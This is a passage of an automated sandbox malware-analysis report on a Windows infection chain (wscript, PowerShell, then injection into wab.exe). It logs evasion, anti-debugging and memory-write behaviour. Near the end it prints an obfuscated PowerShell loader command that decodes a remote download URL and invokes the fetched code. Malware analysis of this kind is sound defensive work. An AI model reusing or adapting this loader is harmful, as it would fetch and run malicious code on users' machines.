              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 501A36B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 3230000 memory reserve | memory write watchJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 22FC0000 memory reserve | memory write watchJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 22CB0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6605Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3197Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7085Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2686Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 1874Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 2529Jump to behavior
              Source: C:\Windows\System32\wscript.exe TID: 6956Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6616Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2696Thread sleep count: 7085 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6016Thread sleep count: 2686 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7048Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -13835058055282155s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 360Thread sleep count: 1874 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -99886s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 360Thread sleep count: 2529 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -99753s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -99608s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -99499s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -99168s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -98983s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -98636s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -98511s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -98405s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -98295s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -98184s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -98078s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -97968s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -97860s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -97735s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -97610s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -97485s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -97360s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -97235s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -97110s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -96985s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -96860s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -96735s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -96610s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -96469s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -96317s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -95997s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7140Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 100000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99886Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99753Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99608Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99499Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99168Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98983Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98636Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98511Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98405Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98295Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98184Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98078Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97968Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97860Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97735Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97610Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97485Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97360Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97235Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97110Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96985Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96860Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96735Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96610Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96469Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96317Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95997Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: wscript.exe, 00000000.00000003.1277612998.0000029F535EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1278770323.0000029F535EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1279999065.0000029F535EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1276189657.0000029F535EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp(
              Source: wscript.exe, 00000000.00000003.1277612998.0000029F535EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1278770323.0000029F535EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1279999065.0000029F535EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1276189657.0000029F535EA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000016.00000002.3747116656.0000000007268000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000016.00000002.3747116656.00000000072BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000010.00000002.3188900570.0000016B70966000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllsN
              Source: wscript.exe, 00000000.00000003.1279668340.0000029F516BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1277852419.0000029F516BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1277429753.0000029F516BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_0275D244 LdrInitializeThunk,LdrInitializeThunk,20_2_0275D244
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeCode function: 24_2_00162A7E GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,24_2_00162A7E
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeCode function: 24_2_00163450 SetUnhandledExceptionFilter,24_2_00163450
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeCode function: 24_2_001632C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_001632C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara matchFile source: amsi64_4704.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4704, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7004, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 44D0000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 323F8A0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($LandbrugsbygnJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
